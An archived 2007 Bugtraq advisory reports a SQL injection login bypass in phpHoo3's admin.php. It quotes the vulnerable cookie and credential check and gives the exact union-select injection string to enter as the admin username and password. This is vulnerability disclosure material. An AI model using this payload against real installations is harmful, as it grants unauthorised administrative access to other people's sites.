lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 6 May 2007 16:18:09 -0000 From: ilkerkandemir@...et.com To: bugtraq@...urityfocus.com Subject: phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability # phpHoo3 Login SQL injection // AYYILDIZ.ORG Gururla Sunar... # download:http://cable-modems.org/phpHoo/files/phphoo3.zip # author : iLker Kandemir < ilkerkandemir <at> mynet.com > # Risk : High # Class : Remote # Vuln. Script : phpHoo3 # tnx : h0tturk,ekin0x,Gencnesil,Gencturk,koray,Ajann .. Vulnerable; ///admin.php code ; if($HooPass == $ADMIN_COOKIE) { //If the cookie exists // should we delete the cookie and start? if (isset($exit_admin)) { setcookie("HooPass", ""); header ("Location: $SITE_URL$SITE_DIR"); exit; } } // Check to see if we are being posted a set of USER/PASS if (isset($LOGIN) && !empty($HTTP_POST_VARS)) { $vars = $HTTP_POST_VARS; if (($vars["USER"] == $ADMIN_USER) && ($vars["PASS"] == $ADMIN_PASS)) { setcookie("HooPass", $ADMIN_COOKIE); header ("Location: $SITE_URL$SITE_DIR"); exit; } //The cookie exists ... ADMIN_USER : 1/**/union/**/select/**/0,1,2,3,4/* ADMIN_PASS : 1/**/union/**/select/**/0,1,2,3,4/* ///admin.php logged...
Powered by blists - more mailing lists